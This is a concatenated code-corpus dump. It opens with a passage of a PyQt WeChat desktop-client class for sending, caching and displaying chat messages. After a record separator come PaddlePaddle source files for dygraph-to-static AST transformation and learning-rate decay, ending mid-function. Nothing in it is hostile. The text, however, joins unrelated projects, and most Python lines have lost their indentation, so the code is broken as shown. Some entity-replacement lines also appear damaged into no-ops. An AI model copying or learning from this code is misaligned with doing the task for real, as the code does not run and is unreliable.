dn = contact['NickName']
self.currentChatUser.setText(wechatutil.unicode(dn))
self.messages.setText('')
if self.msg_cache.has_key(user_name):
messages_list = self.msg_cache[user_name]
for message in messages_list:
self.messages.append((message))
'''
def make_message(self,user_name,msg_body):
'''MSG TEMPLATE
{
id:'',
user:{
head_class='',
head_img = '<img src=xx.jpg/>'
},
body:{
content_class:'',
content:''
}
}
'''
"""
_msg =
{
id:'%s',
user:{
head_class='%s',
head_img = '%s'
},
body:{
content_class:'%s',
content:'%s'
}
} %(
'1',
("divMyHead" if self.wechatweb.user["UserName"] == user_name else "divotherhead"),
"<img src=%s.jpg/>"%(self.config.getContactHeadHome() + user_name),
("triangle-right right" if self.wechatweb.user["UserName"] == user_name else "triangle-left left"),
wechatutil.unicode(msg_body)
)
"""
user = self.wechatweb.getUser()
_msg = {}
_msg['id'] = ""
_user = {}
_user['head_class']=("divMyHead" if user["UserName"] == user_name else "divotherhead")
        _user['head_img'] = "%s\\%s.jpg" % (self.config.customFace, user_name)
_msg['user']=_user
_body = {}
_body['content_class']= ("triangle-right right" if user["UserName"] == user_name else "triangle-left left")
_body['content'] = wechatutil.unicode(msg_body)
_msg['body']=_body
return _msg
def send_msg(self):
        '''
        Send the drafted message to the current chat contact.
        '''
msg_html = self.draft.toHtml()
rr = re.search(r'<img src="([.*\S]*\.gif)"',msg_html,re.I)
msg_body = ""
if rr:
pimages = self.code_emotion(msg_html)
for pimage in pimages:
p = pimage["p"]
msg_body+=p
else:
msg_body = self.draft.toPlainText()
#print("xxxx %s"%msgBody)
#msg_text = str(self.draft.toPlainText())
if not msg_body or len(msg_body) <= 0:
return
msg_body = wechatutil.unicode(msg_body)
msg = Msg(1, msg_body, self.current_chat_contact['UserName'])
response = self.wechatweb.webwx_send_msg(msg)
if not response or response is False:
return False
#if send success
self.stick(select=True)
#self.chatsWidget.selectRow(0)
format_msg = self.msg_timestamp(self.wechatweb.getUser()['NickName'])
#self.messages.page().mainFrame().evaluateJavaScript("append('%s');"%msgBody)
#TODO append msg
self.messages.append(format_msg)
msg_body = msg_body.replace("'", "\'")
msg_body = msg_body.replace('"', '\"')
msg_decode_body = self.decode_emotion(msg_body) if rr else msg_body
msg_text = self.decode_emotion(msg_decode_body)
self.messages.append(wechatutil.unicode(msg_decode_body))
_msg = self.make_message(self.current_chat_contact['UserName'],msg_decode_body)
#script = "nappend('%s','%s','%s','%s','%s');"%(_msg['id'],_msg['user']['head_class'],_msg['user']['head_img'],_msg['body']['content_class'],_msg['body']['content'])
#print(script)
#self.messages.page().mainFrame().evaluateJavaScript(script)
self.draft.setText('')
#TODO FIX BUG
if False:
row_count = self.chatsModel.rowCount()
find = False
for row_number in range(row_count):
user_name_index = self.chatsModel.index(row_number,0)
user_name_obj = self.chatsModel.data(user_name_index)
user_name = user_name_obj.toString()
if user_name and user_name == self.current_chat_contact['UserName']:
find = True
tip_index = self.chatsModel.index(row_number,3)
tips_count_obj = self.chatsModel.data(tip_index)
if tips_count_obj:
tips_count = tips_count_obj.toInt()
if tips_count:
count = tips_count[0]
self.chatsModel.setData(tip_index, "%d"%(count+1))
else:
self.chatsModel.setData(tip_index, "1")
else:
count_tips_item = QtGui.QStandardItem("1")
self.chatsModel.setItem(row_number, 3, count_tips_item)
                    # move from_user_name's row to the top of the sessions
taked_row = self.chatsModel.takeRow(row_number)
self.chatsModel.insertRow(0 ,taked_row)
break;
if find == False:
cells = []
# user name item
user_name_item = QtGui.QStandardItem((user_name))
cells.append(user_name_item)
item = QtGui.QStandardItem(QIcon("resource/icons/hicolor/32x32/apps/wechat.png"),"")
cells.append(item)
dn = self.current_chat_contact['RemarkName'] or self.current_chat_contact['NickName']
#if not dn:
#dn = self.current_chat_contact['NickName']
# user remark or nick name
remark_nick_name_item = QtGui.QStandardItem((dn))
cells.append(remark_nick_name_item)
count_tips_item = QtGui.QStandardItem("1")
cells.append(count_tips_item)
self.chatsModel.insertRow(0,cells)
def upload_send_msg_image(self,contact,ffile):
        '''
        Upload the file and send it as an image or attachment message.
        '''
upload_response = self.wechatweb.webwx_upload_media(contact,ffile)
json_upload_response = json.loads(upload_response)
media_id = json_upload_response['MediaId']
if self.isImage(ffile):
msg = Msg(3, str(media_id), self.current_chat_contact['UserName'])
send_response = self.wechatweb.webwx_send_msg_img(msg)
else:
#parameter: appid,title,type=6,totallen,attachid(mediaid),fileext
fileext = os.path.splitext(ffile)[1]
if fileext and len(fileext) > 1 and fileext.startswith("."):
fileext = fileext[1:(len(fileext))]
content = "<appmsg appid='wxeb7ec651dd0aefa9' sdkver=''><title>%s</title><des></des><action></action><type>6</type><content></content><url></url><lowurl></lowurl><appattach><totallen>%d</totallen><attachid>%s</attachid><fileext>%s</fileext></appattach><extinfo></extinfo></appmsg>"%(os.path.basename(ffile),os.path.getsize(ffile),media_id,fileext)
msg = Msg(6, content, self.current_chat_contact['UserName'])
send_response = self.wechatweb.webwx_send_app_msg(msg)
return send_response
def stick(self,row=None,select=False):
        '''
        :param row: the row to move to the top of the chat contact list
        :param select: whether to select the row after moving it
        '''
        # move this row to the top of the session table;
        # if no row is given, look the contact up in the chat contact list
if not row or row <= 0:
row_count = self.chatsModel.rowCount()
for _row in range(row_count):
index = self.chatsModel.index(_row,0)
user_name_o = self.chatsModel.data(index)
''' Python2
user_name = user_name_o.toString()
'''
user_name = user_name_o
if user_name and user_name == self.current_chat_contact["UserName"]:
row = _row
break;
if row == 0:
return True
elif row >= 1:
taked_row = self.chatsModel.takeRow(row)
self.chatsModel.insertRow(0 ,taked_row)
if select:
self.chatsWidget.selectRow(0)
return True
else:
return False
def over_the_top(self):
'''
:see stick
'''
sticked = self.stick(select=True)
if not sticked:
user = self.get_contact(self.current_chat_contact["UserName"])
self.append_chat_contact(user,action="INSERT",row=0)
self.chatsWidget.selectRow(0)
def isChatRoom(self,user):
'''
:parameter user.the id of user
'''
if user:
return user.startswith('@@')
else:
return False
def get_user_display_name(self,message):
        '''
        Get the user's display name; for a chat room, show the sending member's name.
        '''
        from_user_name = message['FromUserName']
        user = self.wechatweb.getUser()
        # if the sender is the currently logged-in user
        if from_user_name == user["UserName"]:
            from_user = user
        else:
            from_user = self.get_contact(from_user_name)
        from_user_display_name = from_member_name = None
        # for a chat room message, show the member name as the source
        if self.isChatRoom(from_user_name):
content = message['Content']
contents = content.split(":<br/>")
from_user_display_name = from_member_name = contents[0]
members = from_user["MemberList"]
for member in members:
if from_member_name == member['UserName']:
from_user_display_name = member['NickName'] or member['DisplayName'] or from_member_name
break
else:
from_user_display_name = from_user['RemarkName'] or from_user['NickName']
return from_user_display_name or from_user_name
def msg_timestamp(self,userName,createTime=None):
st = time.strftime("%Y-%m-%d %H:%M", time.localtime(createTime) if createTime else time.localtime())
msg_timestamp = ('%s %s') % (userName, st)
return wechatutil.unicode(msg_timestamp)
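        # e.g. msg_timestamp("Alice", 1521960000) -> "Alice 2018-03-25 14:40"
        # (illustrative only; the exact string depends on the local timezone)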
def default_msg_handler(self,msg):
        '''
        Default message handler.
        '''
self.text_msg_handler(msg)
def wxinitial_msg_handler(self,message):
        '''
        msg_type == 51: WeChat initialization message handler.
        Mainly initializes the session list: update it with the returned data.
        '''
        statusNotifyUserName = message["StatusNotifyUserName"]
        #
        # StatusNotifyCode = 2, 4, 5
        # 4: all session-list members at initialization time
        # 2: probably a new session - add this user to the session list
        # 5: still unclear
        #
statusNotifyCode = message["StatusNotifyCode"]
if statusNotifyUserName:
statusNotifyUserNames = statusNotifyUserName.split(",")
lists = []
for userName in statusNotifyUserNames:
exist = False
for tl in self.wechatweb.getChatContacts():
if userName == tl["UserName"]:
exist = True
break
if exist:
continue
if userName.startswith("@@"):
#prepare arguments for batch_get_contact api
group = {}
group['UserName'] = userName
group['ChatRoomId'] = ''
lists.append(group)
params = {
'Count': len(lists),
'List': lists
}
        #update member list and download head image
        # fetch the chat room member lists
self.batch_get_contact(data=params)
logging.debug('statusNotifyCode:%s'%statusNotifyCode)
if statusNotifyCode == 4:
#update chat list
tmp_list = self.wechatweb.getChatContacts()[:]
for userName in statusNotifyUserNames:
exist = False
for tl in tmp_list:
if userName == tl["UserName"]:
exist = True
break
if exist:
continue
for member in self.wechatweb.getFriends():
if userName == member["UserName"]:
self.wechatweb.appendChatContact(member)
#self.append_contact_row(member,self.chatsModel)
break
else:
            logging.warn('statusNotifyCode %s not processed' % statusNotifyCode)
def voice_msg_handler(self,msg):
        '''
        Append a voice message to the chat history.
        '''
        if not self.current_chat_contact:
            pass
        from_user_display_name = self.get_user_display_name(msg)
        format_msg = self.msg_timestamp(from_user_display_name, msg["CreateTime"])
        # if the sender of this message is the current chat contact, show it in the window
from_user_name = msg['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = msg['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode("請在手機端收聽語音"))
else:
pass
def video_msg_handler(self,msg):
        '''
        Append a video message to the chat history.
        '''
        if not self.current_chat_contact:
            pass
        from_user_display_name = self.get_user_display_name(msg)
        format_msg = self.msg_timestamp(from_user_display_name, msg["CreateTime"])
        # if the sender of this message is the current chat contact, show it in the window
from_user_name = msg['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = msg['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode("請在手機端觀看視頻"))
else:
pass
def text_msg_handler(self,message):
        '''
        Append a text message to the chat history.
        '''
        if not self.current_chat_contact:
            pass
        from_user_display_name = self.get_user_display_name(message)
        format_msg = self.msg_timestamp(from_user_display_name, message["CreateTime"])
        # if the sender of this message is the current chat contact, show it in the window
from_user_name = message['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = message['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
content = message['Content']
if self.isChatRoom(from_user_name):
if content.startswith("@"):
contents = content.split(":<br/>")
content = contents[1]
msg_content = self.decode_emotion(content)
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode(msg_content))
else:
pass
def download_msg_img(self,msg_id):
data = self.wechatweb.webwx_get_msg_img(msg_id)
if not data:
return False
img_cache_folder = ('%s/cache/img/'%(self.config.getAppHome()))
msg_img = img_cache_folder+msg_id+'.jpg'
with open(msg_img, 'wb') as image:
image.write(data)
return True
def image_msg_handler(self,message):
        '''
        Append an image message to the chat history.
        '''
        if not self.current_chat_contact:
            pass
        from_user_display_name = self.get_user_display_name(message)
        format_msg = self.msg_timestamp(from_user_display_name, message["CreateTime"])
        msg_id = message['MsgId']
        self.wechatweb.webwx_get_msg_img(msg_id)
        # if the sender of this message is the current chat contact, show it in the window
from_user_name = message['FromUserName']
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = message['ToUserName']
if self.current_chat_contact and from_user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
msg_img = ('<img src=%s/%s.jpg>'%(self.config.getCacheImageHome(),msg_id))
self.messages.append(msg_img)
else:
pass
def sys_msg_handler(self,msg):
        '''
        System message handler (e.g. message recalls).
        '''
if not self.current_chat_contact:
pass
from_user_display_name = self.get_user_display_name(msg)
format_msg = self.msg_timestamp(from_user_display_name,msg["CreateTime"])
xml_content = msg['Content']
if xml_content:
xml_content = xml_content.replace(">",">")
xml_content = xml_content.replace("<","<")
xml_content = xml_content.replace("<br/>","")
user_name = msg['FromUserName']
if user_name == self.wechatweb.getUser()['UserName']:
user_name = msg['ToUserName']
msg_type = msg['MsgType']
if msg_type == 10002:
user_name = msg["FromUserName"]
if self.isChatRoom(user_name):
xml_contents = xml_content.split(":<br/>")
xml_content = xml_contents[1]
doc = xml.dom.minidom.parseString(xml_content)
replacemsg_nodes = doc.getElementsByTagName("replacemsg")
            #old_msgid
            #TODO use the old msg id to remove the recalled message from the history
if replacemsg_nodes:
replacemsg = str(replacemsg_nodes[0].firstChild.data)
                # if the sender is the current chat contact, show the message in the window
if self.current_chat_contact and user_name == self.current_chat_contact['UserName']:
self.messages.append((("%s\r\n%s")%(format_msg,wechatutil.unicode(replacemsg))))
else:
pass
def app_msg_handler(self,msg):
        '''
        Append an app message (content shared from another application) to the chat history.
        '''
if not self.current_chat_contact:
pass
xmlContent = msg['Content']
if xmlContent:
xmlContent = xmlContent.replace(">",">")
xmlContent = xmlContent.replace("<","<")
xmlContent = xmlContent.replace("<br/>","")
print("xmlContent %s"%xmlContent)
user_name = msg['FromUserName']
if user_name == self.wechatweb.getUser()['UserName']:
user_name = msg['ToUserName']
if self.isChatRoom(user_name):
index = xmlContent.find(":")
if index > 0:
xmlContent = xmlContent[index+1:len(xmlContent)]
#print("xml_content %s"%xmlContent)
doc = xml.dom.minidom.parseString(xmlContent)
title_nodes = doc.getElementsByTagName("title")
desc_nodes = doc.getElementsByTagName("des")
app_url_nodes = doc.getElementsByTagName("url")
title = ""
desc = ""
app_url = ""
if title_nodes and title_nodes[0] and title_nodes[0].firstChild:
title = title_nodes[0].firstChild.data
if desc_nodes and desc_nodes[0] and desc_nodes[0].firstChild:
desc = desc_nodes[0].firstChild.data
if app_url_nodes and app_url_nodes[0] and app_url_nodes[0].firstChild:
app_url = app_url_nodes[0].firstChild.data
from_user_display_name = self.get_user_display_name(msg)
format_msg = self.msg_timestamp(from_user_display_name,msg["CreateTime"])
        # if the sender is the current chat contact, show the message in the window
if self.current_chat_contact and user_name == self.current_chat_contact['UserName']:
self.messages.append(format_msg)
self.messages.append(wechatutil.unicode(('%s %s %s')%(title,desc,app_url)))
else:
pass
def put_message_cache(self,cache_key,message):
        '''
        Cache the message keyed by FromUserName and move that contact to the top.
        '''
msg_type = message['MsgType']
'''
if msg_type == 10002 or self.isChatRoom(cache_key):
cache_key = cache_key
else:
cache_key = message['FromUserName']
'''
row_count = self.chatsModel.rowCount()
if row_count <= 0:
self.blocked_messages_pool.append(message)
return False
if cache_key in self.messages_pool:
messages = self.messages_pool[cache_key]
else:
messages = []
messages.append(message)
self.messages_pool[cache_key] = messages
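        # messages_pool layout: {FromUserName: [raw sync messages, ...]};
        # cached entries are replayed by chat_item_clicked when the chat opens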
        #TODO ADD TIPS
        # increment the unread-count tip and move this contact up in the session list
        exist = False  # whether this contact is already in the session list
for row in range(row_count):
index = self.chatsModel.index(row,0)
user_name_o = self.chatsModel.data(index)
user_name = user_name_o
#user_name = self.chatsModel.item(i,0).text()
if user_name and user_name == cache_key:
exist = True
tip_index = self.chatsModel.index(row,3)
tips_count_obj = self.chatsModel.data(tip_index)
if tips_count_obj:
tips_count = tips_count_obj
if tips_count:
self.chatsModel.setData(tip_index, int(tips_count)+1)
else:
self.chatsModel.setData(tip_index, "1")
else:
count_tips_item = QtGui.QStandardItem("1")
self.chatsModel.setItem(row, 3, count_tips_item)
                # move from_user_name's row to the top of the sessions
taked_row = self.chatsModel.takeRow(row)
self.chatsModel.insertRow(0 ,taked_row)
break;
        # no message from this contact before (not in the session list yet), so add them
if not exist:
contact = {}
for member in self.wechatweb.getFriends():
if member['UserName'] == cache_key:
contact = member
break
if not contact:
logging.warn('the contact %s not found in friends'%cache_key)
return False
dn = contact['RemarkName'] or contact['NickName']
#if not dn:
#dn = contact['NickName']
user_name = contact['UserName']
cells = []
# user name item
user_name_item = QtGui.QStandardItem((user_name))
cells.append(user_name_item)
item = QtGui.QStandardItem(QIcon("resource/icons/hicolor/32x32/apps/wechat.png"),"")
cells.append(item)
# user remark or nick name
remark_nick_name_item = QtGui.QStandardItem((dn))
cells.append(remark_nick_name_item)
count_tips_item = QtGui.QStandardItem("1")
cells.append(count_tips_item)
self.chatsModel.insertRow(0,cells)
def msg_handle(self,message):
msg_type = message['MsgType']
if msg_type:
if msg_type == 51:
self.wxinitial_msg_handler(message)
return
if msg_type == 2 or msg_type == 52:
logging.warn('msg not process:')
logging.warn('msg type %d'%msg_type)
logging.warn('msg body %s'%message)
return
#
#
#
from_user_name = message['FromUserName']
if self.isChatRoom(from_user_name):
#user_name = from_user_name
from_user_name = message['FromUserName']
else:
# if the sender equals the logged-in user, the message was probably sent from
# another device, so take ToUserName to display it correctly
if from_user_name == self.wechatweb.getUser()['UserName']:
from_user_name = message['ToUserName']
'''
# if no chat partner is selected, or the sender differs from the current chat partner, store the message in message_cache;
# if the sender is the current chat partner, show the message in the window
'''
if (not self.current_chat_contact) or from_user_name != self.current_chat_contact['UserName']:
self.put_message_cache(from_user_name,message)
else:
if msg_type == 1:
self.text_msg_handler(message)
elif msg_type == 3:
self.image_msg_handler(message)
elif msg_type == 34:
self.voice_msg_handler(message)
elif msg_type == 47:
self.default_msg_handler(message)
elif msg_type == 49:
self.app_msg_handler(message)
elif msg_type == 10002:
self.sys_msg_handler(message)
else:
self.default_msg_handler(message)
def select_emotion(self):
emotionWidget = Emotion(self)
cursor_point = QCursor.pos()
#emotionWidget.move(cursor_point)
emotionWidget.move(QPoint(cursor_point.x(),cursor_point.y()-Emotion.HEIGHT))
emotionWidget.selectChanged.connect(self.get_select_emotion)
emotionWidget.show()
'''
if QDialog.Accepted == emotionWidget.accept():
selected_emotion = emotionWidget.get_selected_emotion()
print("selected_emotion %s"%selected_emotion)
'''
def select_document(self):
fileDialog = QFileDialog(self)
if fileDialog.exec_():
selectedFiles = fileDialog.selectedFiles()
for ffile in selectedFiles:
ffile = str(ffile)
send_response = self.upload_send_msg_image(self.current_chat_contact,ffile)
send_response_dict = json.loads(send_response)
msg_id = send_response_dict["MsgID"]
# on send success, append the image to the history; on failure, append it to the draft
if msg_id:
self.stick(select=True)
self.wechatweb.webwx_get_msg_img(msg_id)
#st = time.strftime("%Y-%m-%d %H:%M:%S ", time.localtime())
#format_msg = ('(%s) %s:') % (st, self.wechatweb.user['NickName'])
format_msg = self.msg_timestamp(self.wechatweb.getUser()['NickName'])
self.messages.append(format_msg)
if self.isImage(ffile):
msg_img = ('<img src=%s/%s.jpg>'%(self.config.getCacheImageHome(),msg_id))
else:
msg_img = ffile
self.messages.append(msg_img)
#_msg = self.make_message(self.wechatweb.getUser()['UserName'],wechatutil.unicode(msg_img))
#self.messages.page().mainFrame().evaluateJavaScript("append('%s');"%(json.dumps(_msg)))
#self.messages.page().mainFrame().evaluateJavaScript("append('%s');"%wechatutil.unicode(msg_img))
else:
#fileName=QtCore.QString.fromUtf8(fileName)
if self.isImage(ffile):
self.draft.append("<img src=%s width=80 height=80>"%(ffile))
else:
print(ffile)
def to_chat(self):
'''triggered by the send-message button:
add this contact to the chat list and show the conversation
'''
user_name = self.user_name_label.text()
print("to_chat user_name %s"%(user_name))
self.current_chat_contact = self.get_contact(user_name)
if self.current_chat_contact:
self.messages_clear()
self.switch_chat(show=True)
self.over_the_top()
def keyPressEvent(self,event):
print("keyPressEvent")
def synccheck(self,loop=True):
'''
:see webwx_sync_process
'''
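# Long-poll WeChat's sync-check endpoint in a loop; a retcode of '1101'
# below means the web session has expired and we have to log in again.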
while (True):
st = time.strftime("%Y-%m-%d %H:%M:%S ", time.localtime())
logging.debug('[push]synccheck %s' %(st))
try:
(code, selector) = self.wechatweb.sync_check()
except Exception:
logging.exception('sync_check failed, trying to relogin')
self.relogin()
continue
if code == -1 and selector == -1:
logging.error("self.wechatweb.sync_check() error")
else:
if code != '0':
if code == '1101' and selector == '0':
logging.debug("session timeout")
self.relogin()
break
else:
if selector != '0':
sync_response = self.wechatweb.webwx_sync()
#print("WeChatSync.run#webwx_sync:")
if sync_response:
self.messageReceived.emit(sync_response)
#self.webwx_sync_process(sync_response)
if loop is False:
break
sleep(15)
``` |
{
"source": "0YuanZhang0/Paddle",
"score": 2
} |
#### File: dygraph/dygraph_to_static/ast_transformer.py
```python
from __future__ import print_function
import astor
import copy
# gast is a generic AST to represent Python2 and Python3's Abstract Syntax Tree(AST).
# It provides a compatibility layer between the AST of various Python versions,
# as produced by ast.parse from the standard ast module.
# See details in https://github.com/serge-sans-paille/gast/
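# A minimal illustrative sketch of gast usage (assumes only that gast is
# installed; the snippet is not part of this module):
#     import gast, textwrap
#     tree = gast.parse(textwrap.dedent("def f(x):\n    return x + 1"))
#     # `tree` can now be visited/transformed uniformly across Python versions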
import gast
import inspect
import textwrap
from paddle.fluid import unique_name
from paddle.fluid.dygraph.dygraph_to_static.break_continue_transformer import BreakContinueTransformer
from paddle.fluid.dygraph.dygraph_to_static.ifelse_transformer import IfElseTransformer
from paddle.fluid.dygraph.dygraph_to_static.list_transformer import ListTransformer
from paddle.fluid.dygraph.dygraph_to_static.loop_transformer import LoopTransformer
from paddle.fluid.dygraph.dygraph_to_static.tensor_shape_transformer import TensorShapeTransformer
from paddle.fluid.dygraph.dygraph_to_static.static_analysis import AstNodeWrapper
from paddle.fluid.dygraph.dygraph_to_static.static_analysis import NodeVarType
from paddle.fluid.dygraph.dygraph_to_static.static_analysis import StaticAnalysisVisitor
from paddle.fluid.dygraph.dygraph_to_static.utils import ast_to_func
from paddle.fluid.dygraph.dygraph_to_static.utils import is_paddle_api, is_dygraph_api, is_to_variable
from paddle.fluid.dygraph.dygraph_to_static.utils import to_assign_node, to_static_ast, update_args_of_func
from paddle.fluid.dygraph.dygraph_to_static.utils import dygraph_class_to_static_api
__all__ = ['DygraphToStaticAst', 'convert_to_static']
DECORATOR_NAMES = [
'dygraph_to_static_code', 'dygraph_to_static_program',
'dygraph_to_static_func', 'dygraph_to_static_output'
]
class DygraphToStaticAst(gast.NodeTransformer):
"""
Main class to transform Dygraph to Static Graph
"""
def get_static_ast(self, root):
# save root for some analysis may need global AST
self.root = root
self.static_analysis_visitor = StaticAnalysisVisitor(root)
self.static_analysis_root = self.static_analysis_visitor.get_node_wrapper_root(
)
self.decorate_func_name = None
self.arg_name_to_idx = {}
self.transfer_from_node_type(self.static_analysis_root)
return self.static_analysis_root
def transfer_from_node_type(self, node_wrapper):
# Generic transformation
self.visit(node_wrapper.node)
# Transform basic api of dygraph to static graph and get feed_name_to_arg_name
basic_api_trans = BasicApiTransformer(node_wrapper)
basic_api_trans.transform()
self.feed_name_to_arg_name = basic_api_trans.get_feed_name_to_arg_id()
# Transform Tensor.shape into fluid.layers.shape(Tensor)
TensorShapeTransformer(node_wrapper).transform()
# Transform list used in control flow
ListTransformer(node_wrapper).transform()
# Transform break/continue in loops
BreakContinueTransformer(node_wrapper).transform()
# Transform for loop and while loop
LoopTransformer(node_wrapper).transform()
# Transform all if/else statement of Dygraph into Static Graph.
IfElseTransformer(node_wrapper).transform()
def visit_FunctionDef(self, node):
if self.decorate_func_name is None:
self.decorate_func_name = node.name
for idx, arg in enumerate(node.args.args):
self.arg_name_to_idx[arg.id] = idx
self.generic_visit(node)
# Remove the decorated name of dygraph_to_static
if hasattr(node, 'decorator_list'):
decorator_list = [
d for d in node.decorator_list if d.id not in DECORATOR_NAMES
]
node.decorator_list = decorator_list
return node
def get_module_name(self):
"""
Return the main function name which will be used as module name
in ast_to_func.
"""
# Should consider BaseAPITransformer, which adds a new module name, in Yamei's PR.
assert self.decorate_func_name, "decorate_func_name shall not be None."
return self.decorate_func_name
def get_feed_name_to_idx(self):
feed_name_to_idx = {}
for feed_name, arg_name in self.feed_name_to_arg_name.items():
feed_name_to_idx[feed_name] = self.arg_name_to_idx.get(arg_name)
return feed_name_to_idx
class BasicApiTransformer(gast.NodeTransformer):
"""
Class to transform basic API from dygraph to static graph.
"""
def __init__(self, wrapper_root):
assert isinstance(
wrapper_root, AstNodeWrapper
), "Input non-AstNodeWrapper node for the initialization of BasicApiTransformer."
self.wrapper_root = wrapper_root
self.root = wrapper_root.node
self.class_node_dict = {}
# Used for transformation of data feed
self.feed_name_to_arg_id = {}
self.name_to_tensor_shape = {}
def transform(self):
self.visit(self.root)
return self.wrapper_root
def visit_FunctionDef(self, node):
self.generic_visit(node)
if hasattr(node, 'decorator_list'):
decorator_list = [
d for d in node.decorator_list if d.id not in DECORATOR_NAMES
]
node.decorator_list = decorator_list
return node
def visit_Assign(self, node):
if self._update_class_node_dict(node):
return None
for child_node in gast.walk(node.value):
if isinstance(child_node, gast.Call):
self._visit_Call(child_node)
return node
def visit_Expr(self, node):
value_node = node.value
for child_node in gast.walk(value_node):
if isinstance(child_node, gast.Call):
if is_dygraph_api(child_node):
return
else:
self._visit_Call(child_node)
return node
def _visit_Call(self, node):
assert isinstance(node, gast.Call)
# Replace API `to_variable` with `fluid.layers.assign`
if is_to_variable(node):
self._update_feed_dict(node)
node = to_assign_node(node)
return node
func_name = astor.to_source(gast.gast_to_ast(node.func))
if self._is_dygraph_forward(func_name):
class_node = self._get_class_node(func_name)
static_node = to_static_ast(node, class_node)
return static_node
else:
return node
def _is_dygraph_forward(self, func_id):
return func_id in self.class_node_dict
def _get_class_node(self, func_id):
return self.class_node_dict[func_id]
def _update_class_node_dict(self, node):
assert isinstance(node, gast.Assign)
node_value = node.value
if isinstance(node_value, gast.Call):
if is_to_variable(node_value):
return False
if is_dygraph_api(node_value):
dygraph_api = node_value.func.attr
if not dygraph_class_to_static_api.get(dygraph_api):
return False
update_args_of_func(node_value, node_value, "__init__")
target_str = astor.to_source(gast.gast_to_ast(node.targets[0]))
self.class_node_dict[target_str] = node_value
return True
# TODO: node.value is not dygraph class
return False
def _update_feed_dict(self, node):
assert isinstance(node, gast.Call)
value_node = None
for kw in node.keywords:
if kw.arg == 'value':
value_node = kw.value # eg: `a` for "value=a "
if not value_node:
value_node = node.args[0]
if not isinstance(value_node, gast.Name):
return
else:
var_name = value_node.id
feed_var_name = unique_name.generate(var_name) # eg: "a_0"
self.feed_name_to_arg_id[
feed_var_name] = var_name # eg: "a_0" : "a"
def get_feed_name_to_arg_id(self):
return self.feed_name_to_arg_id
def convert_to_static(dyfunc):
"""
Converts dygraph function into static function.
"""
# Get AST from dygraph function
raw_code = inspect.getsource(dyfunc)
code = textwrap.dedent(raw_code)
root = gast.parse(code)
# Transform AST
dygraph_to_static = DygraphToStaticAst()
root_wrapper = dygraph_to_static.get_static_ast(root)
# Get static_func from AST
static_func, file_name = ast_to_func(root_wrapper.node, dyfunc)
return static_func, dygraph_to_static
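# A hypothetical usage sketch -- `my_dygraph_func` below is illustrative,
# not a name from this module:
#     def my_dygraph_func(x):
#         ...
#     static_func, transformer = convert_to_static(my_dygraph_func)
#     # static_func is the transformed callable; transformer keeps the
#     # feed-name/argument mappings computed during transformation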
```
#### File: fluid/layers/learning_rate_scheduler.py
```python
from __future__ import print_function
import math
import numbers
from . import control_flow
from . import nn
from . import ops
from . import tensor
from ..framework import default_main_program, Parameter, unique_name, name_scope
from ..framework import Variable
from ..framework import in_dygraph_mode
from ..dygraph import learning_rate_scheduler as imperate_lr
__all__ = [
'exponential_decay', 'natural_exp_decay', 'inverse_time_decay',
'polynomial_decay', 'piecewise_decay', 'noam_decay', 'cosine_decay',
'linear_lr_warmup'
]
def _decay_step_counter(begin=0):
# the first global step is zero in learning rate decay
global_step = nn.autoincreased_step_counter(
counter_name='@LR_DECAY_COUNTER@', begin=begin, step=1)
global_step = tensor.cast(global_step, 'float32')
return global_step
def noam_decay(d_model, warmup_steps, learning_rate=1.0):
"""
Noam decay method. The numpy implementation of noam decay is as follows.
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# set hyper parameters
base_lr = 0.01
d_model = 2
current_steps = 20
warmup_steps = 200
# compute
lr_value = base_lr * np.power(d_model, -0.5) * np.min([
np.power(current_steps, -0.5),
np.power(warmup_steps, -1.5) * current_steps])
Please reference `attention is all you need
<https://arxiv.org/pdf/1706.03762.pdf>`_.
Args:
d_model(Variable): The dimensionality of input and output of model.
warmup_steps(Variable): The number of warmup steps, a hyperparameter.
learning_rate(Variable|float|int): The initial learning rate. If the type
is Variable, it's a tensor with shape [1], the data type can be
float32 or float64. It also can be set to python int number. Default 1.0
Returns:
The decayed learning rate.
Examples:
.. code-block:: python
import paddle.fluid as fluid
warmup_steps = 100
learning_rate = 0.01
lr = fluid.layers.learning_rate_scheduler.noam_decay(
1/(warmup_steps *(learning_rate ** 2)),
warmup_steps,
learning_rate)
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.NoamDecay(
d_model, warmup_steps, learning_rate=learning_rate)
return decay
else:
global_step = _decay_step_counter(1)
a = global_step**-0.5
b = (warmup_steps**-1.5) * global_step
lr_value = learning_rate * (d_model**-0.5) * nn.elementwise_min(a,
b)
return lr_value
def exponential_decay(learning_rate, decay_steps, decay_rate, staircase=False):
"""
Applies exponential decay to the learning rate.
When training a model, it is often recommended to lower the learning rate as the
training progresses. By using this function, the learning rate will be decayed by
'decay_rate' every 'decay_steps' steps.
Decayed learning rate calculates as follows:
>>> if staircase == True:
>>> decayed_learning_rate = learning_rate * decay_rate ^ floor(global_step / decay_steps)
>>> else:
>>> decayed_learning_rate = learning_rate * decay_rate ^ (global_step / decay_steps)
Args:
learning_rate(Variable|float): The initial learning rate. It should be a Variable
or a float
decay_steps(int): The learning rate decay steps. See the decay computation above.
decay_rate(float): The learning rate decay rate. See the decay computation above.
staircase(bool): If True, decay the learning rate at discrete intervals, which
means the learning rate will be decayed by `decay_rate` every
`decay_steps`. If False, the learning rate will be decayed continuously,
following the formula above. Default: False
Returns:
Variable: The decayed learning rate. The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
base_lr = 0.1
sgd_optimizer = fluid.optimizer.SGD(
learning_rate=fluid.layers.exponential_decay(
learning_rate=base_lr,
decay_steps=10000,
decay_rate=0.5,
staircase=True))
"""
with default_main_program()._lr_schedule_guard():
if in_dygraph_mode():
decay = imperate_lr.ExponentialDecay(learning_rate, decay_steps,
decay_rate, staircase)
return decay
else:
global_step = _decay_step_counter()
div_res = global_step / decay_steps
if staircase:
div_res = ops.floor(div_res)
